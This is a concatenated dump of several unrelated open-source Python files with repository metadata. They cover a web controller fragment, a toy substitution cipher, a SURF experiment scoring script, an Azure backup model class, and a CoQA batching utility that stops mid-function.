# of the search in the db. If this hasn't been set up, the form comes up blank.
#lists all the Listening Posts owned by this user, those saved by others in the same group, and those
# saved as client-worthy (by an admin)
@expose(template="buzzbot.templates.viewLPs")
def viewLPs(self):
#figure out who this user is and where he belongs
thisID = identity.current.identity()
thisUser = thisID.user_id
thisUserGroup = thisID.groups
#grab all the searches - this is a bit inefficient, but we won't have millions for a while
lps = model.Listeningpost.select()
lpsToDisplay = [] #an array of search objects to pass the the controller
editURL = [] # ...and a parallel array that flags that editing is allowed
deleteURL =[] # ...and one to signal that deletion is allowed
allUsers = User.select()
#there's probably a more efficient way to do this, but this puts user's own searches on top
for s in lps:
if s.userid == thisUser: #give the user full run of his own searches
lpToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id) + "?owner")
deleteURL.append("/verifyDeleteLP/" + str(s.id))
#if the search begins to someone else and it's public consider adding it
for s in lps:
if s.userid <> thisUser and s.is_public:
ownerSearchObj = User.selectBy(s.userid)
thisOwner = ownerSearchObj[0]
thisOwnerGroup = thisOwner.groups
if thisOwnerGroup == thisUserGroup:
lpsToDisplay.append(s)
editURL.append("/editLP/" + str(s.id)+ "?nonOwner")
deleteURL.append("")
#now find client-worthy searches (perhaps added by an admin)
for s in lps:
if s.is_client_worthy:
#screen out searches we've already added
addMe=True
for d in lpsToDisplay:
if d.id == s.id:
addMe=False
if addMe:
lpsToDisplay.append(s)
editURL.append("/editLP/" + str(s.id)+ "?admin")
deleteURL.append("")
#create a widgetList to pass in; each will be named after the search it represents
widgetList = widgets.WidgetsList() #a true widgetsList object
wNameList=[] #a list of the widget names
for s in lpsToDisplay:
#for testing, if it has an even number check the box
if s.id%2 ==1: #note: % is the modulus operator:
mydefault = True #note: this will not take a 1 in place of true
else:
mydefault = False
wName = "ck_" + str(s.id)
#w = widgets.CheckBox(name = wName, default = mydefault, validators=validators.Bool)
w = widgets.CheckBox(name = wName, default = mydefault)
#for some reason the default value doesn't stick unless we specify it separately
w.default = mydefault
widgetList.append(w)
wNameList.append(wName)
#prepare the objects for display; this instansiates a TableForm widget, passing in our check boxes
myFormWidget = widgets.TableForm(fields = widgetList,
method = "post",
submit_text = "OK",
name = "formName"
)
#this directs the returned form to the processSearchInput method
submit_action="/processSearchInput"
return dict(form=myFormWidget, searches=searchesToDisplay, editlink = editURL,
deletelink = deleteURL, action = submit_action)
@expose(template="buzzbot.templates.edit_search_form")
def editsearch(self, parameter_1, tg_errors=None):
try:
submit_action = "/save_searchedit/%s" %parameter_1
b = model.Search.get(int(parameter_1))
except:
b = []
return dict(form=edit_search_form, values = b, action = submit_action)
#Process the user input here. Elements of the form have the same names as the
# class attributes (i.e., database columns) so we can just pass the kwargs array
# to the database management routines (SQLObject)
@expose()
@error_handler(edit_search_form)
@validate(form= edit_search_form)
def save_searchedit(self, parameter_1, **kwargs):
#Form field parameters are strings, but some of the database fields are ints so
# we'll need to convert them. This is a bit ugly but it works
items = kwargs.items() #this gets an dict array of (key, value) tuples
for thisItem in items:
k, v = thisItem #parse the tuple
try:
thisValueAsNumber = int(v) #if this doesn't raise an error, the field is a number
kwargs[k]=thisValueAsNumber #update the dict by assigning a new value to the key
except:
pass #if we have raised an error, we have text and will leave it alone
#now we'll inject the data into the database.
if parameter_1 <> '0': #this updates an existing record
b= Search.get(int(parameter_1))
b.set(**kwargs)
else:
#we have a new entry, and we'll let the database autoindex its id; this passes in
# a dict structure of form elements. NB all db columns must be spec'd in widgetList.
model.Search(**kwargs)
#this brings control back to the viewSearches screen w/ a random number to ensure refresh
raise redirect("/buildLP/" + str(random.randint(1,10000)))
def fixDB(self):
mydata = model.Content.select()
for d in mydata:
d.set(user_id=1)
d.set(search_id=1)
| 49.126005
| 116
| 0.590482
|
cf79f13ad44ac716032680a899813140e9054a17
| 2,060
|
py
|
Python
|
fluss0r.py
|
tamasgal/fluss0r
|
6a006a8f9fd1b3abc60bec1bafb155a67100f225
|
[
"MIT"
] | null | null | null |
fluss0r.py
|
tamasgal/fluss0r
|
6a006a8f9fd1b3abc60bec1bafb155a67100f225
|
[
"MIT"
] | null | null | null |
fluss0r.py
|
tamasgal/fluss0r
|
6a006a8f9fd1b3abc60bec1bafb155a67100f225
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Fluss0r.
Usage:
fluss0r.py
fluss0r.py [-i -s]
fluss0r.py -h | --help
fluss0r.py --version
Options:
-i Interactive session.
-s Activate speech output.
-h --help Show this screen.
--version Show version.
"""
from __future__ import unicode_literals
import os
from docopt import docopt
FROM_MAP = "abcdefghijklmnopqrstuvwxyzäöüß"
TO_MAP = "ökpgihdfeßbvszücwtmrälqyxnuaoj"
def translate(text, map1, map2):
map1 += map1.upper()
map2 += map2.upper()
def translate_char(c):
try: return map2[map1.index(c)]
except ValueError: return c
return "".join(translate_char(c) for c in text)
class UniversalTranslator(object):
def __init__(self, from_map, to_map):
self.from_map = from_map + from_map.upper()
self.to_map = to_map + to_map.upper()
def __call__(self, text, decrypt=False):
if decrypt:
return self.decrypt(text)
return self.encrypt(text)
def encrypt(self, text):
return self._project(text, self.from_map, self.to_map)
def decrypt(self, text):
return self._project(text, self.to_map, self.from_map)
def _project(self, text, code1, code2):
return "".join(self._project_char(c, code1, code2) for c in text)
def _project_char(self, char, code1, code2):
try:
return code2[code1.index(char)]
except ValueError:
return char
def run_loop(prompt, say=False):
translator = UniversalTranslator(FROM_MAP, TO_MAP)
try:
while True:
text = input(prompt)
encrypted = translator.encrypt(text)
print(encrypted)
if say:
os.system("say {0}".format(encrypted).encode('utf-8'))
except (KeyboardInterrupt, EOFError):
raise SystemExit
if __name__ == '__main__':
arguments = docopt(__doc__, version='fluss0r 0.0')
prompt = ""
if arguments['-i']:
prompt = "> "
run_loop(prompt, arguments['-s'])
| 24.819277
| 73
| 0.621845
|
5f1b52b59d9db2c44fccb1f5cf6c3ef9de176595
| 2,679
|
py
|
Python
|
preprocessing/surf_map.py
|
sniafas/Features2d-demo
|
e18995f610a97bb9afcb29655fa82cc5decded82
|
[
"MIT"
] | null | null | null |
preprocessing/surf_map.py
|
sniafas/Features2d-demo
|
e18995f610a97bb9afcb29655fa82cc5decded82
|
[
"MIT"
] | null | null | null |
preprocessing/surf_map.py
|
sniafas/Features2d-demo
|
e18995f610a97bb9afcb29655fa82cc5decded82
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import subprocess
import json
from json_tricks.np import load
if __name__ == '__main__':
## #----------------- # ##
buildings = []
bestQuery = ''
expBuildings = (subprocess.check_output(["ls surf_experiments/", "-x"], shell=True))
exp_path = "surf_experiments/"
# Inlier Threshold acquired from the F1 score peak given from the PRF plot
inlier_thres = 10
### Append available experimental buildings ###
for j in expBuildings.splitlines():
buildings.append(j)
#experimental building ids
ids = ['03','13','15','22','39','60']
# Parsing for every building / individual inlier threshold
for buildingIdx in ids:
expCounter = 0
Precision = 0
Recall = 0
F = 0
totalP = 0
totalR = 0
totalF = 0
bestP = 0
bestR = 0
bestF = 0
meanPrecision = 0
meanRecall = 0
meanF = 0
for query in buildings:
print "Opening %s" % query
with open(exp_path + query + '/results.json') as s:
results = json.load(s)
with open(exp_path + query + '/classRank.json') as cR:
classResults = json.load(cR)
# Query Build Class == current building
if query[8:10] == buildingIdx:
N_results = 0
for resultValid in results['Results']['__ndarray__']:
# Matches >= the inlier threshold are counted
if resultValid[0][2] >= inlier_thres:
N_results +=1
if N_results > 0:
C_results = 0
# Retrieved Images from the same class query building
for classValid in classResults['ClassRank']['__ndarray__']:
if classValid[0][2] >= inlier_thres:
C_results +=1
if N_results > 0 and C_results > 0 :
#Precision, Recall, Fscore metrics
Precision = float(C_results) / N_results
totalP = totalP + Precision
print "\tExperiment Precision %.3f" % Precision
# 15 images/building, query image is omitted
Recall = float(C_results) / 14
totalR = totalR + Recall
print "\tExperiment Recall %.3f" % Recall
F = float((2 * Precision * Recall)) / (Precision + Recall)
print "\tExperiment F Measure %.3f" % F
totalF = totalF + F
print "Total Precision %.3f" % totalP
print "Total Recall %.3f" % totalR
print "Total F %.3f \n" % totalF
expCounter += 1
else:
pass
meanPrecision = totalP / expCounter
meanRecall = totalR / expCounter
meanF = totalF / expCounter
print "Mean Precision %.3f" % meanPrecision
print "Mean Recall %.3f" % meanRecall
print "Mean F %.3f" % meanF
log = open("surf_results/map/surf_MAP_" + str(buildingIdx),'w')
log.write("%.3f,%.3f,%.3f,%s" % (meanPrecision,meanRecall,meanF,str(buildingIdx)))
log.close()
| 27.90625
| 85
| 0.633819
|
f6458bd8f65e8f0942242dd4a2cfb41748eb3ba1
| 5,735
|
py
|
Python
|
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/azure_iaa_sclassic_compute_vm_protected_item.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-07-23T08:59:24.000Z
|
2018-07-23T08:59:24.000Z
|
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/azure_iaa_sclassic_compute_vm_protected_item.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-11-29T14:46:42.000Z
|
2018-11-29T14:46:42.000Z
|
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/azure_iaa_sclassic_compute_vm_protected_item.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-08-28T14:36:47.000Z
|
2018-08-28T14:36:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .azure_iaa_svm_protected_item import AzureIaaSVMProtectedItem
class AzureIaaSClassicComputeVMProtectedItem(AzureIaaSVMProtectedItem):
"""IaaS VM workload-specific backup item representing the Classic Compute VM.
All required parameters must be populated in order to send to Azure.
:param backup_management_type: Type of backup managemenent for the backed
up item. Possible values include: 'Invalid', 'AzureIaasVM', 'MAB', 'DPM',
'AzureBackupServer', 'AzureSql', 'AzureStorage', 'AzureWorkload',
'DefaultBackup'
:type backup_management_type: str or
~azure.mgmt.recoveryservicesbackup.models.BackupManagementType
:param workload_type: Type of workload this item represents. Possible
values include: 'Invalid', 'VM', 'FileFolder', 'AzureSqlDb', 'SQLDB',
'Exchange', 'Sharepoint', 'VMwareVM', 'SystemState', 'Client',
'GenericDataSource', 'SQLDataBase', 'AzureFileShare', 'SAPHanaDatabase'
:type workload_type: str or
~azure.mgmt.recoveryservicesbackup.models.DataSourceType
:param container_name: Unique name of container
:type container_name: str
:param source_resource_id: ARM ID of the resource to be backed up.
:type source_resource_id: str
:param policy_id: ID of the backup policy with which this item is backed
up.
:type policy_id: str
:param last_recovery_point: Timestamp when the last (latest) backup copy
was created for this backup item.
:type last_recovery_point: datetime
:param backup_set_name: Name of the backup set the backup item belongs to
:type backup_set_name: str
:param create_mode: Create mode to indicate recovery of existing soft
deleted data source or creation of new data source. Possible values
include: 'Invalid', 'Default', 'Recover'
:type create_mode: str or
~azure.mgmt.recoveryservicesbackup.models.CreateMode
:param protected_item_type: Required. Constant filled by server.
:type protected_item_type: str
:param friendly_name: Friendly name of the VM represented by this backup
item.
:type friendly_name: str
:param virtual_machine_id: Fully qualified ARM ID of the virtual machine
represented by this item.
:type virtual_machine_id: str
:param protection_status: Backup status of this backup item.
:type protection_status: str
:param protection_state: Backup state of this backup item. Possible values
include: 'Invalid', 'IRPending', 'Protected', 'ProtectionError',
'ProtectionStopped', 'ProtectionPaused'
:type protection_state: str or
~azure.mgmt.recoveryservicesbackup.models.ProtectionState
:param health_status: Health status of protected item. Possible values
include: 'Passed', 'ActionRequired', 'ActionSuggested', 'Invalid'
:type health_status: str or
~azure.mgmt.recoveryservicesbackup.models.HealthStatus
:param health_details: Health details on this backup item.
:type health_details:
list[~azure.mgmt.recoveryservicesbackup.models.AzureIaaSVMHealthDetails]
:param last_backup_status: Last backup operation status.
:type last_backup_status: str
:param last_backup_time: Timestamp of the last backup operation on this
backup item.
:type last_backup_time: datetime
:param protected_item_data_id: Data ID of the protected item.
:type protected_item_data_id: str
:param extended_info: Additional information for this backup item.
:type extended_info:
~azure.mgmt.recoveryservicesbackup.models.AzureIaaSVMProtectedItemExtendedInfo
"""
_validation = {
'protected_item_type': {'required': True},
}
_attribute_map = {
'backup_management_type': {'key': 'backupManagementType', 'type': 'str'},
'workload_type': {'key': 'workloadType', 'type': 'str'},
'container_name': {'key': 'containerName', 'type': 'str'},
'source_resource_id': {'key': 'sourceResourceId', 'type': 'str'},
'policy_id': {'key': 'policyId', 'type': 'str'},
'last_recovery_point': {'key': 'lastRecoveryPoint', 'type': 'iso-8601'},
'backup_set_name': {'key': 'backupSetName', 'type': 'str'},
'create_mode': {'key': 'createMode', 'type': 'str'},
'protected_item_type': {'key': 'protectedItemType', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'virtual_machine_id': {'key': 'virtualMachineId', 'type': 'str'},
'protection_status': {'key': 'protectionStatus', 'type': 'str'},
'protection_state': {'key': 'protectionState', 'type': 'str'},
'health_status': {'key': 'healthStatus', 'type': 'str'},
'health_details': {'key': 'healthDetails', 'type': '[AzureIaaSVMHealthDetails]'},
'last_backup_status': {'key': 'lastBackupStatus', 'type': 'str'},
'last_backup_time': {'key': 'lastBackupTime', 'type': 'iso-8601'},
'protected_item_data_id': {'key': 'protectedItemDataId', 'type': 'str'},
'extended_info': {'key': 'extendedInfo', 'type': 'AzureIaaSVMProtectedItemExtendedInfo'},
}
def __init__(self, **kwargs):
super(AzureIaaSClassicComputeVMProtectedItem, self).__init__(**kwargs)
self.protected_item_type = 'Microsoft.ClassicCompute/virtualMachines'
| 51.205357
| 97
| 0.689451
|
362bae8cd1471781ad007519d81a9927002d7339
| 5,093
|
py
|
Python
|
Upscaled_data/upscaled_only_pts.py
|
HsKA-OSGIS/PostRep
|
6e35842067cf0f69d1c1c7b2e1d0731b6cdb550a
|
[
"MIT"
] | 5
|
2018-12-02T21:12:16.000Z
|
2019-08-07T08:00:06.000Z
|
Upscaled_data/upscaled_only_pts.py
|
HsKA-OSGIS/PostRep
|
6e35842067cf0f69d1c1c7b2e1d0731b6cdb550a
|
[
"MIT"
] | null | null | null |
Upscaled_data/upscaled_only_pts.py
|
HsKA-OSGIS/PostRep
|
6e35842067cf0f69d1c1c7b2e1d0731b6cdb550a
|
[
"MIT"
] | null | null | null |
import shapefile
import csv
from random import uniform, random, choice
from string import ascii_uppercase, ascii_lowercase
from time import time
initial_time = time()
#-----------------------------------------------------------------------------
#---------------------------- Functions ----------------------------
def polygon_coord_from_shp(file):
""" Reads shapefile and extracts the coordinates of the polygon
- Uses first feature
- file: shapefile with path"""
shape = shapefile.Reader(file)
# first feature of the shapefile
feature = shape.shapeRecords()[0]
first = feature.shape.__geo_interface__ # GeoJSON format
polygon = list(first['coordinates'][0])
return polygon
def point_in_polygon(x, y, polygon):
""" Check if a point is inside a polygon
- x,y - Coordinates of the point
- polygon - List of the vertices of the polygon [(x1, x2), (x2, y2), ..., (xn, yn)]"""
i = 0
j = len(polygon) - 1
res = False
for i in range(len(polygon)):
if (polygon[i][1] < y and polygon[j][1] >= y) \
or (polygon[j][1] < y and polygon[i][1] >= y):
if polygon[i][0] + (y - polygon[i][1]) / (polygon[j][1] - polygon[i][1]) * (
polygon[j][0] - polygon[i][0]) < x:
res = not res
j = i
return res
#-----------------------------------------------------------------------------
# Empty lists and others variables
all_data_list, date_list, city_list = [], [], []
coord_list, coord_list2, coord_list3 = [], [], []
new_list_city, new_list_x, new_list_y, new_list_z = [], [], [], []
x_min, y_min, z_min = 99999, 99999, 99999
x_max, y_max, z_max = -99999, -99999, -99999
cont=0
#-----------------------------------------------------------------------------
#------------------------- Times to upscale data: ------------------------
t = 1000
print('Times to upscale is: ' + str(t))
""" Open the original file from \home\user\PostRep\input
Is delimited by coma (,). The header has to be added manually.
- Format for header:
id,city,x,y,z,date,time,value
"""
print('Openning the files..')
f = open("/home/user/PostRep/input/data.csv", "r")
reader = csv.DictReader(f, delimiter=',')
'''Creating a new csv file:
That file is to test upscaled data.
It will be introduce as relation table station_info in the DataBase.'''
f2 = open("/home/user/PostRep/Upscaled_data/new_station_info_"+str(t)+".csv", 'wb')
# The names of resulting columuns for upscaled data
csv_columns = ['id','city','x','y','z']
writer = csv.DictWriter(f2,fieldnames=csv_columns)
writer.writeheader()
print('Creating lists...')
for row in reader:
# Creating a new list with: coord x, coord y, coord z and city
if row['x']+','+row['y']+','+row['z']+',' + row['city'] not in coord_list:
cont+=1
coord_list.append(row['x']+','+row['y']+','+row['z']+','+row['city'])
coord_list2.append(row['x'] + ',' + row['y'])
# Adding lines from original data
data = {'id': cont, 'city': row['city'], 'x': row['x'], 'y': row['y'], 'z': row['z']}
writer.writerow(data)
# Defining max and min for new coordinates
if x_min >= float(row['x']): x_min = float(row['x'])
if x_max <= float(row['x']): x_max = float(row['x'])
if y_min >= float(row['y']): y_min = float(row['y'])
if y_max <= float(row['y']): y_max = float(row['y'])
if z_min >= float(row['z']): z_min = float(row['z'])
if z_max <= float(row['z']): z_max = float(row['z'])
""" Since the original bourder of Germany has too much borders to check, it has been simplified."""
file2 = "/home/user/PostRep/Upscaled_data/Simplified_boundary_Germany/germany2.shp"
print('Opening shp file..')
polygon = polygon_coord_from_shp(file2) # Creating dictionary from shapefile
# Creating new random points coordinates and City's names:
print('Creating a new coordinates...')
cont2=0
times = t * len(coord_list2)
while cont2<times:
x, y = uniform(x_min, x_max), uniform(y_min, y_max)
# Check if new created point is inside of the boundary and the point is already exists
if point_in_polygon(x, y, polygon) == True and ["'" + str(x) + "," + str(y) + "'"] not in coord_list2 and [x,y] not in coord_list3:
coord_list3.append([x,y])
cont2 += 1
line = {'city': choice(ascii_uppercase) + choice(ascii_lowercase) + choice(ascii_lowercase) + choice(ascii_lowercase) + choice(ascii_lowercase),
'y': "{0:.3f}".format(y),
'x': "{0:.3f}".format(x),
'z': "{0:.3f}".format(uniform(z_min, z_max)),
'id': len(coord_list) + cont2}
writer.writerow(line)
# Close the csv files
print len(coord_list3)
f.close()
f2.close()
print ('The process is finished.')
final_time = time()
execution_time = final_time - initial_time
print ('The execution time was: '+ str(execution_time) + ' seconds.') # In seconds
| 42.798319
| 153
| 0.564697
|
e03454bd59be4a31a926ce7307bc5d4af234c279
| 21,481
|
py
|
Python
|
Utils/CoQAUtils.py
|
mpandeydev/SDnetmod
|
c8cdf6150e3cd28330359a7d81df236729522a69
|
[
"MIT"
] | 1
|
2019-04-03T18:30:53.000Z
|
2019-04-03T18:30:53.000Z
|
Utils/CoQAUtils.py
|
mpandeydev/SDnetmod
|
c8cdf6150e3cd28330359a7d81df236729522a69
|
[
"MIT"
] | null | null | null |
Utils/CoQAUtils.py
|
mpandeydev/SDnetmod
|
c8cdf6150e3cd28330359a7d81df236729522a69
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import re
import os
import sys
import random
import string
import logging
import argparse
import unicodedata
from shutil import copyfile
from datetime import datetime
from collections import Counter
from collections import defaultdict
import torch
import msgpack
import json
import numpy as np
import pandas as pd
from Models.Bert.tokenization import BertTokenizer
from Utils.GeneralUtils import normalize_text, nlp
from Utils.Constants import *
from torch.autograd import Variable
from tqdm import tqdm
POS = {w: i for i, w in enumerate([''] + list(nlp.tagger.labels))}
ENT = {w: i for i, w in enumerate([''] + nlp.entity.move_names)}
def build_embedding(embed_file, targ_vocab, wv_dim):
vocab_size = len(targ_vocab)
emb = np.random.uniform(-1, 1, (vocab_size, wv_dim))
emb[0] = 0 # <PAD> should be all 0 (using broadcast)
w2id = {w: i for i, w in enumerate(targ_vocab)}
lineCnt = 0
with open(embed_file, encoding="utf8") as f:
for line in f:
lineCnt = lineCnt + 1
if lineCnt % 100000 == 0:
print('.', end='', flush=True)
elems = line.split()
token = normalize_text(''.join(elems[0:-wv_dim]))
if token in w2id:
emb[w2id[token]] = [float(v) for v in elems[-wv_dim:]]
return emb
def token2id_sent(sent, w2id, unk_id=None, to_lower=False):
if to_lower:
sent = sent.lower()
w2id_len = len(w2id)
ids = [w2id[w] if w in w2id else unk_id for w in sent]
return ids
def char2id_sent(sent, c2id, unk_id=None, to_lower=False):
if to_lower:
sent = sent.lower()
cids = [[c2id["<STA>"]] + [c2id[c] if c in c2id else unk_id for c in w] + [c2id["<END>"]] for w in sent]
return cids
def token2id(w, vocab, unk_id=None):
return vocab[w] if w in vocab else unk_id
'''
Generate feature per context word according to its exact match with question words
'''
def feature_gen(context, question):
counter_ = Counter(w.text.lower() for w in context)
total = sum(counter_.values())
term_freq = [counter_[w.text.lower()] / total for w in context]
question_word = {w.text for w in question}
question_lower = {w.text.lower() for w in question}
question_lemma = {w.lemma_ if w.lemma_ != '-PRON-' else w.text.lower() for w in question}
match_origin = [w.text in question_word for w in context]
match_lower = [w.text.lower() in question_lower for w in context]
match_lemma = [(w.lemma_ if w.lemma_ != '-PRON-' else w.text.lower()) in question_lemma for w in context]
C_features = list(zip(term_freq, match_origin, match_lower, match_lemma))
return C_features
'''
Get upper triangle matrix from start and end scores (batch)
Input:
score_s: batch x context_len
score_e: batch x context_len
context_len: number of words in context
max_len: maximum span of answer
use_cuda: whether GPU is used
Output:
expand_score: batch x (context_len * context_len)
'''
def gen_upper_triangle(score_s, score_e, max_len, use_cuda):
batch_size = score_s.shape[0]
context_len = score_s.shape[1]
# batch x context_len x context_len
expand_score = score_s.unsqueeze(2).expand([batch_size, context_len, context_len]) + \
score_e.unsqueeze(1).expand([batch_size, context_len, context_len])
score_mask = torch.ones(context_len)
if use_cuda:
score_mask = score_mask.cuda()
score_mask = torch.ger(score_mask, score_mask).triu().tril(max_len - 1)
empty_mask = score_mask.eq(0).unsqueeze(0).expand_as(expand_score)
expand_score.data.masked_fill_(empty_mask.data, -float('inf'))
return expand_score.contiguous().view(batch_size, -1) # batch x (context_len * context_len)
class BatchGen:
def __init__(self, opt, data, use_cuda, vocab, char_vocab, evaluation=False):
# file_name = os.path.join(self.spacyDir, 'coqa-' + dataset_label + '-preprocessed.json')
self.data = data
self.use_cuda = use_cuda
self.vocab = vocab
self.char_vocab = char_vocab
self.evaluation = evaluation
self.opt = opt
if 'PREV_ANS' in self.opt:
self.prev_ans = self.opt['PREV_ANS']
else:
self.prev_ans = 2
if 'PREV_QUES' in self.opt:
self.prev_ques = self.opt['PREV_QUES']
else:
self.prev_ques = 0
self.use_char_cnn = 'CHAR_CNN' in self.opt
self.bert_tokenizer = None
if 'BERT' in self.opt:
if 'BERT_LARGE' in opt:
print('Using BERT Large model')
tokenizer_file = os.path.join(opt['datadir'], opt['BERT_large_tokenizer_file'])
print('Loading tokenizer from', tokenizer_file)
self.bert_tokenizer = BertTokenizer.from_pretrained(tokenizer_file)
else:
print('Using BERT base model')
tokenizer_file = os.path.join(opt['datadir'], opt['BERT_tokenizer_file'])
print('Loading tokenizer from', tokenizer_file)
self.bert_tokenizer = BertTokenizer.from_pretrained(tokenizer_file)
self.answer_span_in_context = 'ANSWER_SPAN_IN_CONTEXT_FEATURE' in self.opt
self.ques_max_len = (30 + 1) * self.prev_ans + (25 + 1) * (self.prev_ques + 1)
self.char_max_len = 30
print('*****************')
print('prev_ques :', self.prev_ques)
print('prev_ans :', self.prev_ans)
print('ques_max_len:', self.ques_max_len)
print('*****************')
c2id = {c: i for i, c in enumerate(char_vocab)}
# random shuffle for training
if not evaluation:
indices = list(range(len(self.data)))
random.shuffle(indices)
self.data = [self.data[i] for i in indices]
def __len__(self):
return len(self.data)
def bertify(self, words):
if self.bert_tokenizer is None:
return None
bpe = ['[CLS]']
x_bert_offsets = []
for word in words:
now = self.bert_tokenizer.tokenize(word)
x_bert_offsets.append([len(bpe), len(bpe) + len(now)])
bpe.extend(now)
bpe.append('[SEP]')
x_bert = self.bert_tokenizer.convert_tokens_to_ids(bpe)
return x_bert, x_bert_offsets
def __iter__(self):
data = self.data
MAX_ANS_SPAN = 15
for datum in tqdm(data):
if not self.evaluation:
# remove super long answers for training
datum['qas'] = [qa for qa in datum['qas'] if
len(qa['annotated_answer']['word']) == 1
or qa['answer_span'][1] - qa['answer_span'][0] < MAX_ANS_SPAN]
if len(datum['qas']) == 0:
continue
context_len = len(datum['annotated_context']['wordid'])
x_len = context_len
qa_len = len(datum['qas'])
batch_size = qa_len
x = torch.LongTensor(1, x_len).fill_(0)
x_char = torch.LongTensor(1, x_len, self.char_max_len).fill_(0)
if 'BERT' in self.opt:
x_bert, x_bert_offsets = self.bertify(datum['annotated_context']['word'])
x_bert_mask = torch.LongTensor(1, len(x_bert)).fill_(1)
x_bert = torch.tensor([x_bert], dtype=torch.long)
x_bert_offsets = torch.tensor([x_bert_offsets], dtype=torch.long)
x_pos = torch.LongTensor(1, x_len).fill_(0)
x_ent = torch.LongTensor(1, x_len).fill_(0)
if self.answer_span_in_context:
x_features = torch.Tensor(batch_size, x_len, 5).fill_(0)
else:
x_features = torch.Tensor(batch_size, x_len, 4).fill_(0)
query = torch.LongTensor(batch_size, self.ques_max_len).fill_(0)
query_char = torch.LongTensor(batch_size, self.ques_max_len, self.char_max_len).fill_(0)
query_bert_offsets = torch.LongTensor(batch_size, self.ques_max_len, 2).fill_(0)
q_bert_list = []
ground_truth = torch.LongTensor(batch_size, 2).fill_(-1)
context_id = datum['id']
context_str = datum['context']
context_words = datum['annotated_context']['word']
context_word_offsets = datum['raw_context_offsets']
answer_strs = []
turn_ids = []
x[0, :context_len] = torch.LongTensor(datum['annotated_context']['wordid'])
if self.use_char_cnn:
for j in range(context_len):
t = min(len(datum['annotated_context']['charid'][j]), self.char_max_len)
x_char[0, j, :t] = torch.LongTensor(datum['annotated_context']['charid'][j][:t])
x_pos[0, :context_len] = torch.LongTensor(datum['annotated_context']['pos_id'])
x_ent[0, :context_len] = torch.LongTensor(datum['annotated_context']['ent_id'])
for i in range(qa_len):
x_features[i, :context_len, :4] = torch.Tensor(datum['qas'][i]['context_features'])
turn_ids.append(int(datum['qas'][i]['turn_id']))
# query
p = 0
ques_words = []
# put in qa
for j in range(i - self.prev_ans, i + 1):
if j < 0:
continue;
if not self.evaluation and \
datum['qas'][j]['answer_span'][
0] == -1: # questions with "unknown" answers are filtered out
continue
q = [2] + datum['qas'][j]['annotated_question']['wordid']
q_char = [[0]] + datum['qas'][j]['annotated_question']['charid']
if j >= i - self.prev_ques and p + len(q) <= self.ques_max_len:
ques_words.extend(['<Q>'] + datum['qas'][j]['annotated_question']['word'])
# <Q>: 2, <A>: 3
query[i, p:(p + len(q))] = torch.LongTensor(q)
if self.use_char_cnn:
for k in range(len(q_char)):
t = min(self.char_max_len, len(q_char[k]))
query_char[i, p + k, :t] = torch.LongTensor(q_char[k][:t])
ques = datum['qas'][j]['question'].lower()
p += len(q)
a = [3] + datum['qas'][j]['annotated_answer']['wordid']
a_char = [[0]] + datum['qas'][j]['annotated_answer']['charid']
if j < i and j >= i - self.prev_ans and p + len(a) <= self.ques_max_len:
ques_words.extend(['<A>'] + datum['qas'][j]['annotated_answer']['word'])
query[i, p:(p + len(a))] = torch.LongTensor(a)
if self.use_char_cnn:
for k in range(len(a_char)):
t = min(self.char_max_len, len(a_char[k]))
query_char[i, p + k, :t] = torch.LongTensor(a_char[k][:t])
p += len(a)
if self.answer_span_in_context:
st = datum['qas'][j]['answer_span'][0]
ed = datum['qas'][j]['answer_span'][1] + 1
x_features[i, st:ed, 4] = 1.0
if 'BERT' in self.opt:
now_bert, now_bert_offsets = self.bertify(ques_words)
query_bert_offsets[i, :len(now_bert_offsets), :] = torch.tensor(now_bert_offsets, dtype=torch.long)
q_bert_list.append(now_bert)
# answer
ground_truth[i, 0] = datum['qas'][i]['answer_span'][0]
ground_truth[i, 1] = datum['qas'][i]['answer_span'][1]
answer = datum['qas'][i]['raw_answer']
if answer.lower() in ['yes', 'yes.']:
ground_truth[i, 0] = -1
ground_truth[i, 1] = 0
answer_str = 'yes'
if answer.lower() in ['no', 'no.']:
ground_truth[i, 0] = 0
ground_truth[i, 1] = -1
answer_str = 'no'
if answer.lower() == ['unknown', 'unknown.']:
ground_truth[i, 0] = -1
ground_truth[i, 1] = -1
answer_str = 'unknown'
if ground_truth[i, 0] >= 0 and ground_truth[i, 1] >= 0:
answer_str = answer
all_viable_answers = [answer_str]
if 'additional_answers' in datum['qas'][i]:
all_viable_answers.extend(datum['qas'][i]['additional_answers'])
answer_strs.append(all_viable_answers)
if 'BERT' in self.opt:
bert_len = max([len(s) for s in q_bert_list])
query_bert = torch.LongTensor(batch_size, bert_len).fill_(0)
query_bert_mask = torch.LongTensor(batch_size, bert_len).fill_(0)
for i in range(len(q_bert_list)):
query_bert[i, :len(q_bert_list[i])] = torch.LongTensor(q_bert_list[i])
query_bert_mask[i, :len(q_bert_list[i])] = 1
if self.use_cuda:
x_bert = Variable(x_bert.cuda(async=True))
x_bert_mask = Variable(x_bert_mask.cuda(async=True))
query_bert = Variable(query_bert.cuda(async=True))
query_bert_mask = Variable(query_bert_mask.cuda(async=True))
else:
x_bert = Variable(x_bert)
x_bert_mask = Variable(x_bert_mask)
query_bert = Variable(query_bert)
query_bert_mask = Variable(query_bert_mask)
else:
x_bert = None
x_bert_mask = None
x_bert_offsets = None
query_bert = None
query_bert_mask = None
query_bert_offsets = None
if self.use_char_cnn:
